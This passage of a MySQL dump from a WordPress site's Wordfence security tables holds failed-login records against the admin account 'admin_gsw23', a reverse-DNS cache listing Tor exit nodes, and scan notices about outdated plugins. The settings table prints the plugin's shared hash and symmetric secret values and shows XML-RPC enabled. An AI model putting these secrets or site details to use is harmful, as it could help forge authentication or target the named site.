(37,50,1691939738.217364,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0>','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(38,52,1691939753.665106,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0+h','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0'),
(39,53,1691939755.343445,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0+h','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),
(40,54,1691939756.600410,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0+h','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0'),
(41,55,1691939758.227227,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0+h','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),
(42,56,1691939766.690491,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0a','Mozilla/5.0 (Linux; Android 10; LM-X420) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),
(43,57,1691939767.359390,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0z|<','Mozilla/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),
(44,58,1691939768.679426,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0a','Mozilla/5.0 (Linux; Android 10; LM-X420) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),
(45,59,1691939770.211289,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0z|<','Mozilla/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),
(46,60,1691939786.603869,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0#','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0'),
(47,61,1691939788.601474,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0#','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0'),
(48,65,1691940117.645123,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0D/6','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(49,66,1691940119.538633,1,'loginFailInvalidUsername','startup',0,'\0\0\0\0\0\0\0\0\0\0D/6','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(50,69,1691940294.443765,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(51,70,1691940296.288328,1,'loginFailInvalidUsername','andrea',0,'\0\0\0\0\0\0\0\0\0\0#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(52,72,1691940432.487356,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0\rgS','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(53,73,1691940434.507768,1,'loginFailInvalidUsername','yyadmin',0,'\0\0\0\0\0\0\0\0\0\0\rgS','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(54,76,1691940600.086713,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0Y','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(55,77,1691940602.978995,1,'loginFailInvalidUsername','killo',0,'\0\0\0\0\0\0\0\0\0\0Y','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(56,80,1691940988.338687,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0g\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(57,80,1691940988.352873,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0g\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(58,81,1691940990.632590,1,'loginFailInvalidUsername','zjx2503251359',0,'\0\0\0\0\0\0\0\0\0\0g\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(59,83,1691941217.128554,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0\'iF','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(60,84,1691941220.689323,1,'loginFailInvalidUsername','webnatics',0,'\0\0\0\0\0\0\0\0\0\0\'iF','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(61,86,1691941331.482539,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0g\"','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(62,87,1691941334.229540,1,'loginFailInvalidUsername','cornelis',0,'\0\0\0\0\0\0\0\0\0\0g\"','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(63,89,1691941645.843953,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0#Qa','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(64,90,1691941647.470585,1,'loginFailInvalidUsername','bartek',0,'\0\0\0\0\0\0\0\0\0\0#Qa','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(65,93,1691941984.495518,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0#ru','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(66,94,1691941986.914794,1,'loginFailInvalidUsername','adminn',0,'\0\0\0\0\0\0\0\0\0\0#ru','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(67,96,1691942388.263975,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0Ko','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(68,97,1691942389.847477,1,'loginFailInvalidUsername','hamconage',0,'\0\0\0\0\0\0\0\0\0\0Ko','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(69,99,1691942566.749269,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0ɖ-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0');
/*!40000 ALTER TABLE `dnctiavkr_wflogins` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_wfls_2fa_secrets`
--

DROP TABLE IF EXISTS `dnctiavkr_wfls_2fa_secrets`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_wfls_2fa_secrets` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL,
  `secret` tinyblob NOT NULL,
  `recovery` blob NOT NULL,
  `ctime` int(10) unsigned NOT NULL,
  `vtime` int(10) unsigned NOT NULL,
  `mode` enum('authenticator') NOT NULL DEFAULT 'authenticator',
  PRIMARY KEY (`id`),
  KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_wfls_2fa_secrets`
--

LOCK TABLES `dnctiavkr_wfls_2fa_secrets` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_wfls_2fa_secrets` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_wfls_2fa_secrets` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_wfls_role_counts`
--

DROP TABLE IF EXISTS `dnctiavkr_wfls_role_counts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_wfls_role_counts` (
  `serialized_roles` varbinary(255) NOT NULL,
  `two_factor_inactive` tinyint(1) NOT NULL,
  `user_count` bigint(20) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`serialized_roles`,`two_factor_inactive`)
) ENGINE=MEMORY DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_wfls_role_counts`
--

LOCK TABLES `dnctiavkr_wfls_role_counts` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_wfls_role_counts` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_wfls_role_counts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_wfls_settings`
--

DROP TABLE IF EXISTS `dnctiavkr_wfls_settings`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_wfls_settings` (
  `name` varchar(191) NOT NULL DEFAULT '',
  `value` longblob DEFAULT NULL,
  `autoload` enum('no','yes') NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_wfls_settings`
--

LOCK TABLES `dnctiavkr_wfls_settings` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_wfls_settings` DISABLE KEYS */;
INSERT INTO `dnctiavkr_wfls_settings` VALUES
('2fa-user-grace-period','10','yes'),
('allow-disabling-ntp','1','yes'),
('allow-xml-rpc','1','yes'),
('captcha-stats','{\"counts\":[0,0,0,0,0,0,0,0,0,0,0],\"avg\":0}','yes'),
('delete-deactivation','','yes'),
('disable-temporary-tables','0','yes'),
('enable-auth-captcha','','yes'),
('enable-login-history-columns','1','yes'),
('enable-shortcode','','yes'),
('enable-woocommerce-account-integration','','yes'),
('enable-woocommerce-integration','','yes'),
('global-notices','[]','yes'),
('ip-source','','yes'),
('ip-trusted-proxies','','yes'),
('last-secret-refresh','1691937371','yes'),
('ntp-failure-count','0','yes'),
('ntp-offset','0.42922687530518','yes'),
('recaptcha-threshold','0.5','yes'),
('remember-device','','yes'),
('remember-device-duration','2592000','yes'),
('require-2fa-grace-period-enabled','','yes'),
('require-2fa.administrator','','yes'),
('schema-version','2','yes'),
('shared-hash-secret','0353edccd8e7fb5411c3e05fc4ade2090502c8007073a05e58f7c4c6bc37eb23','yes'),
('shared-symmetric-secret','3e71f0443e7b215d9a7245a9c021551922ad9c01e43dc1232ea53da028c5b21b','yes'),
('stack-ui-columns','1','yes'),
('use-ntp','1','yes'),
('user-count-query-state','0','yes'),
('whitelisted','','yes'),
('xmlrpc-enabled','1','yes');
/*!40000 ALTER TABLE `dnctiavkr_wfls_settings` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_wfnotifications`
--

DROP TABLE IF EXISTS `dnctiavkr_wfnotifications`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_wfnotifications` (
  `id` varchar(32) NOT NULL DEFAULT '',
  `new` tinyint(3) unsigned NOT NULL DEFAULT 1,
  `category` varchar(255) NOT NULL,
  `priority` int(11) NOT NULL DEFAULT 1000,
  `ctime` int(10) unsigned NOT NULL,
  `html` text NOT NULL,
  `links` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_wfnotifications`
--

LOCK TABLES `dnctiavkr_wfnotifications` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_wfnotifications` DISABLE KEYS */;
INSERT INTO `dnctiavkr_wfnotifications` VALUES
('network-GQ2TGNZW',1,'toupp-20220714',100,1691937500,'<p><strong>Wordfence Terms of Service and UK IDTA</strong></p>\n<p>Please review the updated Terms of Service with the new UK IDTA.\n</p>\n<p><a href=\"https://www.wordfence.com/terms-of-service/?utm_source=plugin&amp;utm_medium=pluginalert&amp;utm_campaign=toupp20220714\" class=\"wf-btn wf-btn-callout wf-btn-primary\" target=\"_blank\">Terms of Service</a> <a href=\"https://www.wordfence.com/uk-international-data-transfer-addendum/?utm_source=plugin&amp;utm_medium=pluginalert&amp;utm_campaign=toupp20220714\" class=\"wf-btn wf-btn-callout wf-btn-primary\" target=\"_blank\">UK IDTA</a></p>\n','[]'),
('site-AEAAAAA',1,'wfplugin_updates',502,1691941380,'<a href=\"http://gsw2023.com/wp-admin/update-core.php\">Updates are available for 13 plugins and 2 themes</a>','[]'),
('site-AMAAAAA',1,'wfplugin_scan',502,1691941380,'<a href=\"http://gsw2023.com/wp-admin/admin.php?page=WordfenceScan\">15 issues found in most recent scan</a>','[]');
/*!40000 ALTER TABLE `dnctiavkr_wfnotifications` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_wfpendingissues`
--

DROP TABLE IF EXISTS `dnctiavkr_wfpendingissues`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_wfpendingissues` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `time` int(10) unsigned NOT NULL,
  `lastUpdated` int(10) unsigned NOT NULL,
  `status` varchar(10) NOT NULL,
  `type` varchar(20) NOT NULL,
  `severity` tinyint(3) unsigned NOT NULL,
  `ignoreP` char(32) NOT NULL,
  `ignoreC` char(32) NOT NULL,
  `shortMsg` varchar(255) NOT NULL,
  `longMsg` text DEFAULT NULL,
  `data` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `lastUpdated` (`lastUpdated`),
  KEY `status` (`status`),
  KEY `ignoreP` (`ignoreP`),
  KEY `ignoreC` (`ignoreC`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_wfpendingissues`
--

LOCK TABLES `dnctiavkr_wfpendingissues` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_wfpendingissues` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_wfpendingissues` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_wfreversecache`
--

DROP TABLE IF EXISTS `dnctiavkr_wfreversecache`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_wfreversecache` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `host` varchar(255) NOT NULL,
  `lastUpdate` int(10) unsigned NOT NULL,
  PRIMARY KEY (`IP`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_wfreversecache`
--

LOCK TABLES `dnctiavkr_wfreversecache` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_wfreversecache` DISABLE KEYS */;
INSERT INTO `dnctiavkr_wfreversecache` VALUES
('\0\0\0\0\0\0\0\0\0\0\"','202.185.27.34.bc.googleusercontent.com',1691937620),
('\0\0\0\0\0\0\0\0\0\03Y*','orion.unicapp.com',1691937641),
('\0\0\0\0\0\0\0\0\0\0AY','ec2-65-1-218-89.ap-south-1.compute.amazonaws.com',1691938895),
('\0\0\0\0\0\0\0\0\0\0gH','103.193.72.4',1691938895),
('\0\0\0\0\0\0\0\0\0\0&','157.245.233.38',1691937623),
('\0\0\0\0\0\0\0\0\0\0d','vmi1259207.contaboserver.net',1691938895),
('\0\0\0\0\0\0\0\0\0\0%.','server.socialnet-ec.com',1691938895),
('\0\0\0\0\0\0\0\0\0\0 ','172.178.12.32',1691937627),
('\0\0\0\0\0\0\0\0\0\0(','station51.net',1691938895),
('\0\0\0\0\0\0\0\0\0\0e<','tor-exit-60.for-privacy.net',1691938895),
('\0\0\0\0\0\0\0\0\0\0*t','14.tor-exit.nothingtohide.nl',1691938895),
('\0\0\0\0\0\0\0\0\0\0#','pf2.prsv.ch',1691938895),
('\0\0\0\0\0\0\0\0\0\0£C','vmi735136.contaboserver.net',1691938895),
('\0\0\0\0\0\0\0\0\0\0d','161.ip-198-100-155.net',1691938895);
/*!40000 ALTER TABLE `dnctiavkr_wfreversecache` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_wfsecurityevents`
--

DROP TABLE IF EXISTS `dnctiavkr_wfsecurityevents`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_wfsecurityevents` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `type` varchar(255) NOT NULL DEFAULT '',
  `data` text NOT NULL,
  `event_time` double(14,4) NOT NULL,
  `state` enum('new','sending','sent') NOT NULL DEFAULT 'new',
  `state_timestamp` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_wfsecurityevents`
--

LOCK TABLES `dnctiavkr_wfsecurityevents` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_wfsecurityevents` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_wfsecurityevents` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_wfsnipcache`
--

DROP TABLE IF EXISTS `dnctiavkr_wfsnipcache`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_wfsnipcache` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `IP` varchar(45) NOT NULL DEFAULT '',
  `expiration` timestamp NOT NULL DEFAULT current_timestamp(),
  `body` varchar(255) NOT NULL DEFAULT '',
  `count` int(10) unsigned NOT NULL DEFAULT 0,
  `type` int(10) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`id`),
  KEY `expiration` (`expiration`),
  KEY `IP` (`IP`),
  KEY `type` (`type`)
) ENGINE=InnoDB AUTO_INCREMENT=45 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_wfsnipcache`
--

LOCK TABLES `dnctiavkr_wfsnipcache` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_wfsnipcache` DISABLE KEYS */;
INSERT INTO `dnctiavkr_wfsnipcache` VALUES
(44,'201.150.45.24','2023-08-13 16:03:16','',0,1);
/*!40000 ALTER TABLE `dnctiavkr_wfsnipcache` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_wfstatus`
--

DROP TABLE IF EXISTS `dnctiavkr_wfstatus`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_wfstatus` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `ctime` double(17,6) unsigned NOT NULL,
  `level` tinyint(3) unsigned NOT NULL,
  `type` char(5) NOT NULL,
  `msg` varchar(1000) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `k1` (`ctime`),
  KEY `k2` (`type`)
) ENGINE=InnoDB AUTO_INCREMENT=11 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_wfstatus`
--

LOCK TABLES `dnctiavkr_wfstatus` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_wfstatus` DISABLE KEYS */;
INSERT INTO `dnctiavkr_wfstatus` VALUES
(1,1691937506.637839,10,'info','SUM_PREP:Preparing a new scan.'),
(2,1691937506.640823,1,'info','Initiating quick scan'),
(3,1691937506.654196,10,'info','SUM_START:Checking Web Application Firewall status'),
(4,1691937506.655002,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),
(5,1691937506.659505,10,'info','SUM_START:Scanning for old themes, plugins and core files'),
(6,1691937506.699452,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),
(7,1691937506.702298,1,'info','-------------------'),
(8,1691937506.705001,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 18 MB'),
(9,1691937506.706723,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),
(10,1691937506.707256,10,'info','SUM_FINAL:Scan complete. You have 19 new issues to fix. See below.');
/*!40000 ALTER TABLE `dnctiavkr_wfstatus` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_wftrafficrates`
--

DROP TABLE IF EXISTS `dnctiavkr_wftrafficrates`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_wftrafficrates` (
  `eMin` int(10) unsigned NOT NULL,
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `hitType` enum('hit','404') NOT NULL DEFAULT 'hit',
  `hits` int(10) unsigned NOT NULL,
  PRIMARY KEY (`eMin`,`IP`,`hitType`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_wftrafficrates`
--

LOCK TABLES `dnctiavkr_wftrafficrates` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_wftrafficrates` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_wftrafficrates` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_wfwaffailures`
--

DROP TABLE IF EXISTS `dnctiavkr_wfwaffailures`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_wfwaffailures` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `throwable` text NOT NULL,
  `rule_id` int(10) unsigned DEFAULT NULL,
  `timestamp` timestamp NOT NULL DEFAULT current_timestamp(),
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_wfwaffailures`
--

LOCK TABLES `dnctiavkr_wfwaffailures` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_wfwaffailures` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_wfwaffailures` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_wpfm_backup`
--

DROP TABLE IF EXISTS `dnctiavkr_wpfm_backup`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_wpfm_backup` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `backup_name` text DEFAULT NULL,
  `backup_date` text DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_wpfm_backup`
--

LOCK TABLES `dnctiavkr_wpfm_backup` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_wpfm_backup` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_wpfm_backup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_wpforms_payment_meta`
--

DROP TABLE IF EXISTS `dnctiavkr_wpforms_payment_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_wpforms_payment_meta` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `payment_id` bigint(20) NOT NULL,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `payment_id` (`payment_id`),
  KEY `meta_key` (`meta_key`(191)),
  KEY `meta_value` (`meta_value`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_wpforms_payment_meta`
--

LOCK TABLES `dnctiavkr_wpforms_payment_meta` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_wpforms_payment_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_wpforms_payment_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_wpforms_payments`
--

DROP TABLE IF EXISTS `dnctiavkr_wpforms_payments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_wpforms_payments` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `form_id` bigint(20) NOT NULL,
  `status` varchar(10) NOT NULL DEFAULT '',
  `subtotal_amount` decimal(26,8) NOT NULL DEFAULT 0.00000000,
  `discount_amount` decimal(26,8) NOT NULL DEFAULT 0.00000000,
  `total_amount` decimal(26,8) NOT NULL DEFAULT 0.00000000,
  `currency` varchar(3) NOT NULL DEFAULT '',
  `entry_id` bigint(20) NOT NULL DEFAULT 0,
  `gateway` varchar(20) NOT NULL DEFAULT '',
  `type` varchar(12) NOT NULL DEFAULT '',
  `mode` varchar(4) NOT NULL DEFAULT '',
  `transaction_id` varchar(40) NOT NULL DEFAULT '',
  `customer_id` varchar(40) NOT NULL DEFAULT '',
  `subscription_id` varchar(40) NOT NULL DEFAULT '',
  `subscription_status` varchar(10) NOT NULL DEFAULT '',
  `title` varchar(255) NOT NULL DEFAULT '',
  `date_created_gmt` datetime NOT NULL,
  `date_updated_gmt` datetime NOT NULL,
  `is_published` tinyint(1) NOT NULL DEFAULT 1,
  PRIMARY KEY (`id`),
  KEY `form_id` (`form_id`),
  KEY `status` (`status`(8)),
  KEY `total_amount` (`total_amount`),
  KEY `type` (`type`(8)),
  KEY `transaction_id` (`transaction_id`(32)),
  KEY `customer_id` (`customer_id`(32)),
  KEY `subscription_id` (`subscription_id`(32)),
  KEY `subscription_status` (`subscription_status`(8)),
  KEY `title` (`title`(64))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_wpforms_payments`
--

LOCK TABLES `dnctiavkr_wpforms_payments` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_wpforms_payments` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_wpforms_payments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_wpforms_tasks_meta`
--

DROP TABLE IF EXISTS `dnctiavkr_wpforms_tasks_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_wpforms_tasks_meta` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `action` varchar(255) NOT NULL,
  `data` longtext NOT NULL,
  `date` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=52 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_wpforms_tasks_meta`
--

LOCK TABLES `dnctiavkr_wpforms_tasks_meta` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_wpforms_tasks_meta` DISABLE KEYS */;
INSERT INTO `dnctiavkr_wpforms_tasks_meta` VALUES
(1,'wpforms_process_forms_locator_scan','W10=','2022-11-12 13:48:09'),
(2,'wpforms_admin_addons_cache_update','W10=','2022-11-12 13:48:10'),
